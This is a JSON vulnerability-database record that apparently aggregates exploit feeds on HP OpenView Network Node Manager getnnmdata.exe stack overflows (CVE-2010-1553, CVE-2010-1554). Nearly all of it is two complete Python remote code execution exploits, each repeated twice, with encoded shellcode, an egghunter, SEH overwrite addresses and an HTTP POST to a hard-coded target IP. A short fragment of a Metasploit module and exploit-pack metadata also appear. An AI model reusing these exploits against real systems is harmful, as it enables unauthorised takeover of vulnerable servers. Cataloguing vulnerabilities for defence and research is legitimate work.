\nhandler \n \nend \n \ndef wfs_delay \n5 \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99673/hp_nnm_snmpviewer_actapp.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:19", "description": "\nHP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution", "edition": 1, "published": "2010-07-02T00:00:00", "title": "HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-02T00:00:00", "id": "EXPLOITPACK:481659315559426EECC8DE2DE311E620", "href": "", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \n# Date: 2010.07.02\n# Author: S2 Crew [Hungary]\n# Software Link: hp.com\n# Version: 7.53\n# Tested on: Windows 2003\n# CVE: CVE-2010-1554\n\n# Code :\n\n#!/usr/bin/python\n\nimport struct\nimport socket\nimport httplib\nimport urllib\n\n# calc.exe Windows Execute Command\nsc2 = (\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\n)\n\negghunter = (\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\"\n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\"\n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n)\n\nret = struct.pack('<L',0x5A667A77) # ppr\njmp1 = '\\xeb\\xf9\\x90\\x90'\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\n\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500\n\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\n\nc = httplib.HTTPConnection('172.16.29.149')\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\nr = c.getresponse()\n\nprint r.status, r.reason\ndata = r.read()\nprint data\nc.close()\n\nprint \"\\nDone\\n\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:19", "description": "\nHP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "edition": 1, "published": "2010-07-02T00:00:00", "title": "HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-02T00:00:00", "id": "EXPLOITPACK:11DF6F45B49D83BD88A199FB4D372A38", "href": "", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \n# Date: 2010.07.02\n# Author: S2 Crew [Hungary]\n# Software Link: hp.com\n# Version: 7.53\n# Tested on: Windows 2003\n# CVE: CVE-2010-1553\n\n# Code :\n\n#!/usr/bin/python\n\nimport struct\nimport socket\nimport httplib\nimport urllib\n\n# calc.exe Windows Execute Command\nsc2 = (\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\n)\n\negghunter = (\n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\"\n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\"\n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\"\n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\"\n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\"\n)\n\nret = struct.pack('<L',0x5A667A77) # ppr\njmp = \"\\x74\\x21\\x44\\x44\"\n\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\n\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\n\nc = httplib.HTTPConnection('172.16.29.149')\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\nr = c.getresponse()\n\nprint r.status, r.reason\ndata = r.read()\nprint data\nc.close()\n\nprint \"\\nDone\\n\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:29:10", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69250", "id": "SSV:69250", "sourceData": "\n # Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1554\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a"\r\n"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41"\r\n"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42"\r\n"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b"\r\n"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79"\r\n"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e"\r\n"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42"\r\n"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44"\r\n"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c"\r\n"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c"\r\n"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62"\r\n"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b"\r\n"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58"\r\n"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47"\r\n"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51"\r\n"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45"\r\n"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d"\r\n"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c"\r\n"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c"\r\n"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47"\r\n"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64"\r\n"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49"\r\n"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56"\r\n"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45"\r\n"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37"\r\n"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50"\r\n"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c"\r\n"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45"\r\n"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50"\r\n"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46"\r\n"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41"\r\n)\r\n\r\negghunter = (\r\n"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a"\r\n"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74"\r\n"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa"\r\n"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp1 = '\\xeb\\xf9\\x90\\x90'\r\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\r\n\r\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + "C"*500\r\n\r\nh = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request("POST","/OvCgi/getnnmdata.exe",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint "\\nDone\\n" \r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69250"}, {"lastseen": "2017-11-19T15:27:52", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69249", "id": "SSV:69249", "sourceData": "\n # Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1553\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a"\r\n"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41"\r\n"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42"\r\n"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b"\r\n"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79"\r\n"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e"\r\n"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42"\r\n"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44"\r\n"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c"\r\n"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c"\r\n"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62"\r\n"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b"\r\n"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58"\r\n"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47"\r\n"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51"\r\n"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45"\r\n"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d"\r\n"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c"\r\n"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c"\r\n"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47"\r\n"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64"\r\n"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49"\r\n"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56"\r\n"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45"\r\n"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37"\r\n"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50"\r\n"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c"\r\n"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45"\r\n"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50"\r\n"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46"\r\n"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41"\r\n)\r\n\r\negghunter = (\r\n"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49"\r\n"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a"\r\n"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32"\r\n"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49"\r\n"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43"\r\n"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a"\r\n"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c"\r\n"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47"\r\n"\\x49\\x6f\\x4b\\x57\\x41\\x41"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp = "\\x74\\x21\\x44\\x44"\r\n\r\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\r\n\r\nh = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request("POST","/OvCgi/getnnmdata.exe",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint "\\nDone\\n" \r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69249"}], "d2": [{"lastseen": "2019-05-29T17:19:06", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "description": "**Name**| d2sec_hpnnm5 \n---|--- \n**CVE**| CVE-2010-1553 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP Network Node Manager 7.53 getnnmdata.exe MaxAge Variable Stack Overflow Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2010-05-13T17:30:00", "published": "2010-05-13T17:30:00", "id": "D2SEC_HPNNM5", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hpnnm5", "title": "DSquare Exploit Pack: D2SEC_HPNNM5", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "**Name**| d2sec_hpnnm6 \n---|--- \n**CVE**| CVE-2010-1552 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP Network Node Manager 7.53 snmpviewer.exe act Variable Stack Overflow Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2010-05-13T17:30:00", "published": "2010-05-13T17:30:00", "id": "D2SEC_HPNNM6", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hpnnm6", "title": "DSquare Exploit Pack: D2SEC_HPNNM6", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
